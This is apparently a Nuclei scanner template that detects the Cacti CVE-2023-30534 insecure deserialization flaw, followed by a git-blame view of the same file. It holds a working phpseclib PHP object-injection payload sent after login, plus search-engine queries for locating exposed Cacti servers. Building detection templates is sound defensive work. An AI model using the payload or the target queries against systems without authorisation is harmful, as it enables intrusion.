nuclei-templates/http/cves/2023/CVE-2023-30534.yaml

id: CVE-2023-30534

info:
  name: Cacti < 1.2.25 Insecure Deserialization
  author: k0pak4
  severity: medium
  description: |
    Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24.
  remediation: This issue has been addressed in version 1.2.25.
  reference:
    - https://github.com/Cacti/cacti/security/advisories/GHSA-77rf-774j-6h3p
    - https://nvd.nist.gov/vuln/detail/CVE-2023-30534
    - https://www.fastly.com/blog/cve-2023-30534-insecure-deserialization-in-cacti-prior-to-1-2-25
    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CFH3J2WVBKY4ZJNMARVOWJQK6PSLPHFH/
    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WOQFYGLZBAWT4AWNMO7DU73QXWPXTCKH/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2023-30534
    cwe-id: CWE-502
    epss-score: 0.09326
    epss-percentile: 0.94688
    cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: cacti
    product: cacti
    shodan-query:
      - title:"Cacti"
      - http.title:"login to cacti"
      - http.title:"cacti"
      - http.favicon.hash:"-1797138069"
    fofa-query:
      - icon_hash="-1797138069"
      - title="cacti"
      - title="login to cacti"
    google-query:
      - intitle:"cacti"
      - intitle:"login to cacti"
  tags: cve,cve2023,cacti,authenticated

http:
  - raw:
      - |
        GET /index.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        __csrf_magic={{url_encode(csrf_token)}}&action=login&login_username={{username}}&login_password={{password}}

      - |
        POST /managers.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=actions&action_receiver_notifications=1&selected_items=a%3A2%3A%7Bi%3A7%3Ba%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1%22%3A2%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3BO%3A19%3A%22phpseclib%5CCrypt%5CAES%22%3A8%3A%7Bs%3A10%3A%22block_size%22%3BN%3Bs%3A12%3A%22inline_crypt%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22phpseclib%5CCrypt%5CTripleDES%22%3A6%3A%7Bs%3A10%3A%22block_size%22%3Bs%3A30%3A%221%29%7B%7D%7D%7D%3B+ob_clean%28%29%3Blsdie%28%29%3B+%3F%3E%22%3Bs%3A12%3A%22inline_crypt%22%3BN%3Bs%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3B%7Di%3A1%3Bs%3A26%3A%22_createInlineCryptFunction%22%3B%7Ds%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3Bi%3A1%3B%7D%7D%7Di%3A7%3Bi%3A7%3B%7D&drp_action=2&__csrf_magic={{url_encode(csrf_token)}}

      - |
        GET /clog.php HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body_4
        regex:
          - "<table[^;]*;['\"]>\\s*(<tr class=['\"]clogError['\"]>[\\s\\S]*unserialize[\\s\\S]*managers.php[\\s\\S]*[Aa]uthenticated)"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrf_token
        part: body
        group: 1
        regex:
          - "var csrfMagicToken = ['\"]([a-z0-9,:;]*)['\"]"
        internal: true
# digest: 4a0a0047304502210083008a3793277d849d64ea59458090e4fd2be2ad78e2a8606675d58d5304f386022015a1039607a70aeb3c85adaa3626ab3b72da216d97120e78bbd5267c1c565608:922c64590222798bb761d5b6d8e72950
Create CVE-2023-30534.yaml 2023-09-13 19:10:39 +00:00			`id: CVE-2023-30534`

			`info:`
			`name: Cacti < 1.2.25 Insecure Deserialization`
			`author: k0pak4`
Update CVE-2023-30534.yaml 2023-12-07 05:21:27 +00:00			`severity: medium`
Create CVE-2023-30534.yaml 2023-09-13 19:10:39 +00:00			`description: \|`
trail space fix 2023-12-07 05:24:20 +00:00			`Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24.`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`remediation: This issue has been addressed in version 1.2.25.`
Create CVE-2023-30534.yaml 2023-09-13 19:10:39 +00:00			`reference:`
			`- https://github.com/Cacti/cacti/security/advisories/GHSA-77rf-774j-6h3p`
Update CVE-2023-30534.yaml 2023-12-07 05:21:27 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2023-30534`
added reference 2023-12-07 05:22:08 +00:00			`- https://www.fastly.com/blog/cve-2023-30534-insecure-deserialization-in-cacti-prior-to-1-2-25`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CFH3J2WVBKY4ZJNMARVOWJQK6PSLPHFH/`
			`- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WOQFYGLZBAWT4AWNMO7DU73QXWPXTCKH/`
Create CVE-2023-30534.yaml 2023-09-13 19:10:39 +00:00			`classification:`
Update CVE-2023-30534.yaml 2023-12-07 05:21:27 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N`
Create CVE-2023-30534.yaml 2023-09-13 19:10:39 +00:00			`cvss-score: 4.3`
			`cve-id: CVE-2023-30534`
			`cwe-id: CWE-502`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`epss-score: 0.09326`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-percentile: 0.94688`
Update CVE-2023-30534.yaml 2023-12-07 05:21:27 +00:00			`cpe: cpe:2.3:a:cacti:cacti::::::::`
Create CVE-2023-30534.yaml 2023-09-13 19:10:39 +00:00			`metadata:`
Merge branch 'main' into updated-tags 2024-01-26 08:18:21 +00:00			`verified: true`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`max-request: 4`
			`vendor: cacti`
			`product: cacti`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query:`
			`- title:"Cacti"`
			`- http.title:"login to cacti"`
			`- http.title:"cacti"`
			`- http.favicon.hash:"-1797138069"`
			`fofa-query:`
			`- icon_hash="-1797138069"`
			`- title="cacti"`
			`- title="login to cacti"`
			`google-query:`
			`- intitle:"cacti"`
			`- intitle:"login to cacti"`
Update CVE-2023-30534.yaml 2023-12-07 05:21:27 +00:00			`tags: cve,cve2023,cacti,authenticated`
Create CVE-2023-30534.yaml 2023-09-13 19:10:39 +00:00
			`http:`
			`- raw:`
			`- \|`
Update CVE-2023-30534.yaml 2023-12-07 05:21:27 +00:00			`GET /index.php HTTP/1.1`
Create CVE-2023-30534.yaml 2023-09-13 19:10:39 +00:00			`Host: {{Hostname}}`

			`- \|`
Update CVE-2023-30534.yaml 2023-12-07 05:21:27 +00:00			`POST /index.php HTTP/1.1`
Create CVE-2023-30534.yaml 2023-09-13 19:10:39 +00:00			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`__csrf_magic={{url_encode(csrf_token)}}&action=login&login_username={{username}}&login_password={{password}}`
Update CVE-2023-30534.yaml 2023-12-07 05:21:27 +00:00
Create CVE-2023-30534.yaml 2023-09-13 19:10:39 +00:00			`- \|`
Update CVE-2023-30534.yaml 2023-12-07 05:21:27 +00:00			`POST /managers.php HTTP/1.1`
Create CVE-2023-30534.yaml 2023-09-13 19:10:39 +00:00			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			action=actions&action_receiver_notifications=1&selected_items=a%3A2%3A%7Bi%3A7%3Ba%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1%22%3A2%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3BO%3A19%3A%22phpseclib%5CCrypt%5CAES%22%3A8%3A%7Bs%3A10%3A%22block_size%22%3BN%3Bs%3A12%3A%22inline_crypt%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22phpseclib%5CCrypt%5CTripleDES%22%3A6%3A%7Bs%3A10%3A%22block_size%22%3Bs%3A30%3A%221%29%7B%7D%7D%7D%3B+ob_clean%28%29%3Blsdie%28%29%3B+%3F%3E%22%3Bs%3A12%3A%22inline_crypt%22%3BN%3Bs%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3B%7Di%3A1%3Bs%3A26%3A%22_createInlineCryptFunction%22%3B%7Ds%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3Bi%3A1%3B%7D%7D%7Di%3A7%3Bi%3A7%3B%7D&drp_action=2&__csrf_magic={{url_encode(csrf_token)}}
Update CVE-2023-30534.yaml 2023-12-07 05:21:27 +00:00
Create CVE-2023-30534.yaml 2023-09-13 19:10:39 +00:00			`- \|`
Update CVE-2023-30534.yaml 2023-12-07 05:21:27 +00:00			`GET /clog.php HTTP/1.1`
Create CVE-2023-30534.yaml 2023-09-13 19:10:39 +00:00			`Host: {{Hostname}}`

			`cookie-reuse: true`
			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`part: body_4`
			`regex:`
			`- "<table[^;];['\"]>\\s(<tr class=['\"]clogError['\"]>[\\s\\S]unserialize[\\s\\S]managers.php[\\s\\S]*[Aa]uthenticated)"`
			`condition: and`

			`- type: status`
			`status:`
			`- 200`

			`extractors:`
			`- type: regex`
			`name: csrf_token`
			`part: body`
			`group: 1`
			`regex:`
			`- "var csrfMagicToken = ['\"]([a-z0-9,:;]*)['\"]"`
Update CVE-2023-30534.yaml 2023-12-07 05:21:27 +00:00			`internal: true`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 4a0a0047304502210083008a3793277d849d64ea59458090e4fd2be2ad78e2a8606675d58d5304f386022015a1039607a70aeb3c85adaa3626ab3b72da216d97120e78bbd5267c1c565608:922c64590222798bb761d5b6d8e72950`